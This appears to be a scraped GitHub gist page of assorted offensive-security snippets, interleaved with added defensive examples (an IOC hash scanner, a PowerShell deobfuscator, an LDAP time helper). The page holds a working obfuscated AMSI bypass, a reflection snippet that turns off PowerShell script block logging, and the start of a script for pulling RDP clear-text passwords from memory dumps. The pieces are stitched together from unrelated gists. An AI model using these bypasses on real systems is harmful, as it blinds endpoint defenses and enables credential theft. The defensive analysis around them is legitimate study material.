
@k4nfr3
k4nfr3 / ioc_vulnerable_drivers.csv
Last active March 28, 2024 07:43
IOC vulnerable drivers
SHA256,Name,Signer,Description
04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows
B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys
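The list above is only useful once something consumes it. The following is an added example, not part of the gist, that parses the CSV with the standard csv module (which handles the doubled-quote signer fields that trip GitHub's preview), rejects truncated rows instead of loading a partial driver name, and hashes every *.sys under a directory against the loaded hashes. The rows embedded in the block are the ones quoted above, including the cut-off last row, and the default scan directory is an assumption for illustration; feed it the full gist for real use.

```python
import csv
import hashlib
import io
import re
import sys
from pathlib import Path

# Constructed sample input: the rows of ioc_vulnerable_drivers.csv shown in the listing above,
# plus the truncated last row exactly as the preview cuts it (two columns instead of four).
IOC_CSV = '''SHA256,Name,Signer,Description
04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows
B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys
'''

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def load_iocs(text):
    """Parse the CSV into ({sha256 (lowercase): {name, signer, description}}, rejected_rows).

    Short (truncated) rows and rows whose hash is not 64 hex digits go to 'rejected'
    so that a broken line is visible instead of silently shrinking or polluting the list."""
    iocs, rejected = {}, []
    for row in csv.DictReader(io.StringIO(text)):
        sha = (row.get("SHA256") or "").strip().lower()
        # DictReader fills missing trailing columns with None; Description may legitimately be "".
        if row.get("Signer") is None or not SHA256_RE.match(sha):
            rejected.append(row)
            continue
        iocs[sha] = {
            "name": row["Name"].strip(),
            # The gist wraps some signers in doubled quotes; csv returns them as "FUJITSU LIMITED ".
            "signer": row["Signer"].strip().strip('"').strip(),
            "description": (row.get("Description") or "").strip(),
        }
    return iocs, rejected


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file so large drivers are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def scan_directory(root, iocs, pattern="*.sys"):
    """Return [(path, ioc_entry)] for every file under root whose SHA-256 is on the list."""
    hits = []
    for path in sorted(Path(root).rglob(pattern)):
        if not path.is_file():
            continue
        try:
            digest = sha256_file(path)
        except OSError:  # locked or unreadable file: skip it rather than abort the whole scan
            continue
        if digest in iocs:
            hits.append((str(path), iocs[digest]))
    return hits


if __name__ == "__main__":
    # Usage: python scan_drivers.py [drivers_dir] [ioc_csv]
    # Defaults (assumed for the demo): the Windows driver store and the embedded sample rows.
    root = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32\drivers"
    text = Path(sys.argv[2]).read_text(encoding="utf-8") if len(sys.argv) > 2 else IOC_CSV
    iocs, rejected = load_iocs(text)
    print(f"[*] {len(iocs)} IOC hashes loaded, {len(rejected)} malformed rows ignored")
    for path, entry in scan_directory(root, iocs):
        print(f"[!] {path}: {entry['name']} (signer: {entry['signer']}) {entry['description']}")
```

Hash matching only catches the exact builds on the list: a recompiled or newer build of the same vulnerable driver has a different SHA-256, so pair this with a name/signer comparison against the loaded entries or with Microsoft's vulnerable driver blocklist rather than relying on the hashes alone.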
@k4nfr3
k4nfr3 / RDP_clear.py
Last active May 20, 2021 07:59
Quick Python script to analyse a memory dump and extract RDP clear-text passwords, while waiting for Mimikatz to integrate it as a module
import re
from collections import namedtuple
import sys
# Clear-text password recovery from a memory dump, as found by @jonasLyk. Tweet: https://twitter.com/jonasLyk/status/1393058962942083076
# Borrowed Python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
# Code inspired by @gentilkiwi's video
# This is for those who, like me, wanted to play with this discovery a little: a quick and dirty python3 script, while waiting to see another module in the great mimikatz tool
# I'm no dev, so PRs and constructive remarks are welcome
# Reaches into PowerShell's cached Group Policy settings through reflection and turns script block
# logging off for the current process; the split strings ('ScriptB'+'lockLogging') keep the
# keyword itself out of the script text.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
    $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
    $val.Add('EnableScriptB'+'lockLogging', 0)
    $val.Add('EnableScriptB'+'lockInvocationLogging', 0)
@k4nfr3
k4nfr3 / am.ps1
Last active February 3, 2022 12:02
AMSI Bypass
Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green
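Both the script block logging snippet earlier on this page and am.ps1 hide the strings a defender would match on (AmsiUtils, amsiInitFailed, ScriptBlockLogging) behind string concatenation, the -f format operator and backtick-split identifiers. As an added example, and not the gist's code, here is a small Python reducer that undoes those three transformations so the underlying type, field and binding flags become readable for triage or detection work. It handles only these constructs (it is not a PowerShell tokenizer), and the two samples it runs on are the lines quoted from the page.

```python
import re

# Constructed sample input: the obfuscated line of am.ps1 from the listing above, verbatim.
AMSI_LINE = r'''S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )'''

# Constructed sample input: one line of the script block logging snippet above, verbatim.
SBL_LINE = "$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0"

# 'a' + 'b'            -> 'ab'
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# "{1}{0}" -f 'x','y'  -> 'yx'; each argument is a literal, optionally wrapped in its own parentheses.
# The lookahead refuses a match whose argument list is still followed by '+' or ',' (not reduced yet).
_ARG = r"(?:\(\s*'[^']*'\s*\)|'[^']*')"
FORMAT = re.compile(r'"([^"]*)"\s*-[fF]\s*(' + _ARG + r"(?:\s*,\s*" + _ARG + r")*)(?!\s*[+,])")
# ( 'x' )              -> 'x', unless the parenthesis follows an identifier, a string or a
#                         type literal, where it is a call or cast and must be kept.
PAREN = re.compile(r"""(?<![\w"\]])\(\s*('[^']*')\s*\)""")


def _reduce_concat(text):
    while True:
        reduced = CONCAT.sub(r"'\1\2'", text)
        if reduced == text:
            return text
        text = reduced


def _apply_format(match):
    fmt, arg_text = match.group(1), match.group(2)
    args = re.findall(r"'([^']*)'", arg_text)
    slots = [int(i) for i in re.findall(r"\{(\d+)\}", fmt)]
    if any(i >= len(args) for i in slots):
        return match.group(0)  # argument list not fully reduced yet: leave it for the next round
    return "'" + re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt) + "'"


def deobfuscate(line):
    """Reduce backtick splitting, concatenation and -f formatting until nothing changes."""
    # A backtick inside a bare word (S`eT-It`em) is a no-op, and inside a double-quoted string it
    # only matters before a real escape character (`n, `t, ...), which these samples never use.
    text = line.replace("`", "")
    while True:
        reduced = _reduce_concat(text)
        reduced = FORMAT.sub(_apply_format, reduced)
        reduced = PAREN.sub(r"\1", reduced)
        if reduced == text:
            return reduced
        text = reduced


def string_literals(line):
    """The single-quoted strings left after reduction: the names worth matching on."""
    return re.findall(r"'([^']*)'", deobfuscate(line))


if __name__ == "__main__":
    for sample in (AMSI_LINE, SBL_LINE):
        print(deobfuscate(sample))
        print("  literals:", string_literals(sample))
```

On am.ps1 the reducer yields `SeT-Item 'VaRIAblE:1q2uZx' ( [TYpE]( 'rEF' ) ) ; ( Get-varIABLE '1Q2UzX' -VaL )."AssEmbly"."GETTYPe"( 'System.Management.Automation.AmsiUtils' )."getfiElD"( 'amsiInitFailed','NonPublic,Static' )."sETVaLUE"(...)`, i.e. the reflection-based bypass that stores the `[ref]` type in a variable, pulls `System.Management.Automation.dll` from it and sets the private static `AmsiUtils.amsiInitFailed` field to `$true`, after which AMSI scanning is skipped for the rest of the process. A detection that looks for those literals in script block logs misses the obfuscated form; matching on the reduced strings, or on the structural `.Assembly.GetType(...).GetField(...).SetValue(` chain, holds up better.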
Scraped from the official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip
18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip
6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip
'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'
#!/usr/bin/env python
from __future__ import print_function
import json
import re
import socket
import ssl
import subprocess
import sys
#!/usr/bin/env python
# Modification of the original GetADUsers.py script from Impacket.
# This version returns the list of machines seen in the last 24h.
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address
#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------
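list_machines.py is described as narrowing the computer list to those seen in the last 24 hours, which means comparing lastLogon, an AD Large Integer stored in Windows FILETIME units, against a threshold. The following added example (not the gist's code, which the listing does not show) does the FILETIME conversion with exact integer arithmetic, builds a server-side LDAP filter for the window, and applies the same cut-off client-side to a constructed set of entries; the machine names and the wall-clock time are assumptions for the demo.

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00 UTC. AD's lastLogon and
# lastLogonTimestamp are stored this way and come back from LDAP as decimal strings.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt):
    """Aware UTC datetime -> FILETIME ticks, in integer arithmetic so nothing is rounded."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def from_filetime(ticks):
    """FILETIME ticks (int, or the decimal string LDAP returns) -> aware UTC datetime.

    Returns None for 0 (never logged on) and for 0x7FFFFFFFFFFFFFFF, the 'never' value
    AD uses on attributes such as accountExpires."""
    ticks = int(ticks)
    if ticks <= 0 or ticks == 0x7FFFFFFFFFFFFFFF:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def recent_machines_filter(now, hours=24):
    """LDAP filter for computer objects whose lastLogon on the queried DC is inside the window."""
    threshold = to_filetime(now - timedelta(hours=hours))
    return f"(&(objectCategory=computer)(lastLogon>={threshold}))"


def recently_seen(entries, now, hours=24):
    """Client-side equivalent: keep entries whose lastLogon falls in [now - hours, now].

    entries: iterable of dicts with 'name' and 'lastLogon' (FILETIME int or str, 0 = never)."""
    cutoff = now - timedelta(hours=hours)
    seen = []
    for entry in entries:
        logon = from_filetime(entry.get("lastLogon") or 0)
        if logon is not None and cutoff <= logon <= now:
            seen.append((entry["name"], logon))
    return seen


# Constructed sample: a few computer objects as they might look once the LDAP attributes are
# pulled into dicts. Names and the reference time are hypothetical, not output from the gist.
NOW = datetime(2022, 6, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_ENTRIES = [
    {"name": "WS01$", "lastLogon": str(to_filetime(NOW - timedelta(hours=2)))},      # string, as LDAP returns it
    {"name": "WS02$", "lastLogon": to_filetime(NOW - timedelta(days=3))},             # too old
    {"name": "SRV01$", "lastLogon": "0"},                                             # never logged on here
    {"name": "WS03$", "lastLogon": to_filetime(NOW - timedelta(hours=23, minutes=59))},  # just inside
]

if __name__ == "__main__":
    print(recent_machines_filter(NOW))
    for name, logon in recently_seen(SAMPLE_ENTRIES, NOW):
        print(f"{name:10} {logon:%Y-%m-%d %H:%M:%S} UTC")
```

lastLogon is not replicated between domain controllers, so either filter only shows logons that the DC named with -dc-ip handled; a complete view means running the query against every DC and merging the results. The replicated alternative, lastLogonTimestamp, is only refreshed when the stored value is more than about two weeks old (minus a random offset), which makes it useless for a 24-hour window.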
@k4nfr3
k4nfr3 / velocity.py
Last active June 30, 2023 15:02
velocity.ch daily script to repurchase my free parking as I'm using it daily
import requests
import json
# Proxy settings for debugging (with Burp or another intercepting proxy)
proxy_enable = False
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
Add NuGet package Microsoft.Win32.Registry
Add NuGet package System.Security.Cryptography.ProtectedData
Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on the latest version, Kiteworks 8.3.0
=========================================
/* Created by Sergei Gundorov 1/2/2020
* Intent: provide sample project for encrypting secrets with DPAPI while working with
* Power BI Embedded and API tutorials and samples.